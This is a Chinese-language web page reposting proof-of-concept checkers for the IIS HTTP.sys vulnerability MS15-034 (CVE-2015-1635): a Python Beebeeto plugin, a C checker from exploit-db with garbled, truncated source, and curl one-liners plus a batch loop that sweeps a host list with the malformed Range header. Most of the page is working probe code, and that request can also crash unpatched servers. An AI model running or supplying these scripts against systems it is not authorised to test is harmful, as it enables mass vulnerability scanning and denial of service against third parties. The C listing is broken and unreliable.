MS15-034 IIS 7.0 HTTP.sys 远程代码执行漏洞(CVE-2015-1635) POC

时间:2016-12-22 11:58 来源:武松娱乐整理 字体:[ ] 评论:
检测脚本一:
Python----beebeeto
http://www.beebeeto.com/pdb/poc-2015-0081/
#!/usr/bin/env python
# coding=utf-8
"""
Site: http://www.beebeeto.com/
Framework: https://github.com/n0tr00t/Beebeeto-framework
"""
import socket
import random
import urlparse
from baseframe import BaseFrame
class MyPoc(BaseFrame):
    poc_info = {
        # poc相关信息
        'poc': {
            'id': 'poc-2015-0081',
            'name': 'IIS 7.0 HTTP.sys 远程代码执行漏洞(CVE-2015-1635) POC',
            'author': 'user1018',
            'create_date': '2015-04-15',
        },
        # 协议相关信息
        'protocol': {
            'name': 'http',
            'port': [80],
            'layer4_protocol': ['tcp'],
        },
        # 漏洞相关信息
        'vul': {
            'app_name': 'IIS',
            'vul_version': ['7.0'],
            'type': 'Code Execution',
            'tag': ['IIS7.0漏洞', 'HTTP.sys漏洞', 'CVE-2015-1635'],
            'desc': '''
                    影响范围:
                        Windows7
                        Windows8
                        Windows server 2008
                        Windows server 2012
                    远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求
                     时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。
                    若要利用此漏洞,攻击者必须将经特殊设计的 HTTP 请求发送到受影响的系统。 通过修改 Windows HTTP 堆栈处理
                     请求的方式,安装更新可以修复此漏洞。
                    ''',
            'references': ['https://technet.microsoft.com/zh-CN/library/security/ms15-034.aspx',
                            'http://bobao.360.cn/news/detail/1435.html'],
        },
    }
    @classmethod
    def verify(cls, args):
        target = args['options']['target']
        if urlparse.urlparse(target).netloc == '':
            ipAddr = urlparse.urlparse(target).path
        else:
            ipAddr = socket.gethostbyname(urlparse.urlparse(target).netloc)
        hexAllFfff = "18446744073709551615"
        req1 = "GET / HTTP/1.0\r\n\r\n"
        req = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n"
         if args['options']['verbose']:
            print '[*] Target: ' + ipAddr
            print '[*] Audit Started'
        client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        client_socket.connect((ipAddr, 80))
        client_socket.send(req1)
        boringResp = client_socket.recv(1024)
        # test ms-iis
        if "Microsoft" not in boringResp:
            print "[*] Not IIS"
            return args
        client_socket.close()
        client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        client_socket.connect((ipAddr, 80))
        client_socket.send(req)
        goodResp = client_socket.recv(1024)
        if "Requested Range Not Satisfiable" in goodResp:
            print "[+] Looks Vulnerability!"
            args['success'] = True
            args['poc_ret']['vulnerability'] = ipAddr
        elif " The request has an invalid header name" in goodResp:
            args['poc_ret']['error'] = "[*] Looks Patched"
        else:
            args['poc_ret']['error'] = "[*] Unexpected response, cannot discern patch status"
         return args
    exploit = verify
if __name__ == '__main__':
    from pprint import pprint
    mp = MyPoc()
    pprint(mp.run())
检测脚本二:
http://www.exploit-db.com/exploits/36773/
/*
UNTESTED - MS15-034 Checker
THE BUG:
    8a8b2112 56              push    esi
    8a8b2113 6a00            push    0
    8a8b2115 2bc7            sub     eax,edi
    8a8b2117 6a01            push    1
    8a8b2119 1bca            sbb     ecx,edx
    8a8b211b 51              push    ecx
    8a8b211c 50              push    eax
    8a8b211d e8bf69fbff      call    HTTP!RtlULongLongAdd (8a868ae1) ; here
    ORIGNAL POC: http://pastebin.com/raw.php?i=ypURDPc4
    BY: john.b.hale@gmai.com
    Twitter: @rhcp011235
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
int connect_to_server(char *ip)
{
    int sockfd = 0, n = 0;
     struct sockaddr_in serv_addr;
     struct hostent *server;
    if((sockfd = socket(AF_INET, SOCK_STREAM, 0))  \n",argv[0]);
        return 1;
    }
    printf("[*] Audit Started\n");
    sockfd = connect_to_server(argv[1]);
    write(sockfd, request, strlen(request));
    read(sockfd, recvBuff, sizeof(recvBuff)-1);
    if (!strstr(recvBuff,"Microsoft"))
    {
        printf("[*] NOT IIS\n");
        exit(1);
    }
    sockfd = connect_to_server(argv[1]);
  {C}    write(sockfd, request1, strlen(request1));
    read(sockfd, recvBuff, sizeof(recvBuff)-1);
    if (strstr(recvBuff,"Requested Range Not Satisfiable"))
    {
                printf("[!!] Looks VULN\n");
                exit(1);
    } else if(strstr(recvBuff,"The request has an invalid header name")) {
    printf("[*] Looks Patched");
} else
    printf("[*] Unexpected response, cannot discern patch status");
}
检测方法三:
最简单的检测方法:
curl -i http://xxx.com/ -H "Host: irrelevant" -H "Range: bytes=0-18446744073709551615"
包含 The requested range is not satisfiable 就表示有漏洞
curl http://xxx.com/ -H "Host: irrelevant" -H "Range: bytes=0-18446744073709551615"|grep "The requested range is not satisfiable"
批量代码:
setlocal enabledelayedexpansion
for /f %%i in (iisf.txt) do (
curl -i %%i -H "Host: irrelevant" -H "Range: bytes=0-18446744073709551615" | find "The requested range is not satisfiable"
)
pause
顶一下(0) 踩一下(0)
Top_arrow
武松娱乐注册